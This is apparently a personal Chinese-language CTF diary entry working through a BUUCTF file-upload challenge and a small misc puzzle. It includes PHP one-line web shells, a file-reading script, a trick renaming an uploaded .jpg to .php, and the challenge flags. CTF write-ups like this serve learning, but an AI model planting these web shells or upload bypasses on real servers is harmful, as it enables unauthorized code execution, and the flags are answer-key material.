22.1.12

又是新的一天，感冒稍微好了点
希望今天的状态可以不错。
还在学一些别的东西。
typora收费了，咱用的是最后一个免费版，主要是正版属实有点小贵。

BUU UPLOAD COURSE 1

打开网页是一个文件上传的系统。

试一试一句话木马

<?php @eval($_GET["cmd"]); ?>

显示文件已储存在: uploads/61de2ea9af7ad.jpg

试一试

http://091478d9-fcbd-4c2d-bda0-ec5a37ef84eb.node4.buuoj.cn:81/index.php?file=uploads/61de2ea9af7ad.jpg

似乎没有显示

试试能不能蚂蚁剑连入。

在蚂蚁剑代码解压出错的时候，我又试了试这个

<?php
  echo "owo";
  ?>

有输出。owo

另外吐槽一下winrar的解压机制，每次都要从C盘复制回来是什么鬼啊。

呃，蚂蚁剑好像有点问题，等待的时候去玩玩misc

蚂蚁剑总算能用了。

中文名真的是个恐怖的东西。

竟然显示返回数据为空。

那就试试手动构建
<?php @eval("ls"); ?>

好像eval被禁用了。

但是问题不大，发现php文件是可以被执行的。于是，直接用php枚举文件。

检查目录:/tmp
/tmp/flag.sh
/tmp/html/index.php
/tmp/html/upload.php

发现了flag
尝试获得文件。

用phpcat进行cat文件。
#!/bin/bash echo $FLAG >> /flag export FLAG=not_flag FLAG=not_flag rm -f /flag.sh

真的是..
那就继续搜
/tmp/html/index.php 没有什么值钱的东西
/tmp/html/upload.php 也没有什么值钱的东西

那就试试/flag 
flag{55ff3ec8-67fe-4b64-be71-e1ef8556f3aa}
真的服了，猜中了。

问题就在这，开始的暴力枚举的脚本遇到没权限的会报错，但是我也没写try所以有问题。

但为什么evel不能用呢？

phpcat.php

<?php
$the_file_path = "/tmp/flag.sh" ;
$fp = fopen ( $the_file_path , "r" );
$str = fread ( $fp , filesize ( $the_file_path ));
echo $str;
?>

吼住

网上说好像.jpg 蚂蚁剑不能直接执行，那么是不是可以用php把代码重名为.php呢？
说干就干！

第3个小标

<?php
//uploads/61de3a0442c88.jpg

echo "try:";
echo rename("uploads/61de3a0442c88.jpg","uploads/e.php");
?>

    
得到:    
try:1

第4个小标

//用之前的脚本
./uploads/61de380d1be04.jpg
./uploads/61de3828bcf26.jpg
./uploads/61de382bed83e.jpg
./uploads/61de3831f1d58.jpg
./uploads/61de387f9098f.jpg
./uploads/61de3a4fed328.jpg
./uploads/e.php
./uploads/61de3ac10a928.jpg
    
那么是不是成功了呢？
    
<?php @eval(system($_POST["owo"]));?>

还是显示连接失败，但是访问/uploads/ee.php
已经显示有空白页面，而且不是nginx的
我觉得是服务器禁止了eval
结束:看别人的博客看到了一个挺不错的软件，叫POSTMAN

N种方法解决

下载下来是个exe
发现好像没法直接运行。没法zip打开。
linux下file KEY.exe: ASCII text, with very long lines, with no line terminators
看样子是个图片，扫描显示KEY{dca57f966e4e4e31fd5b15417da63269}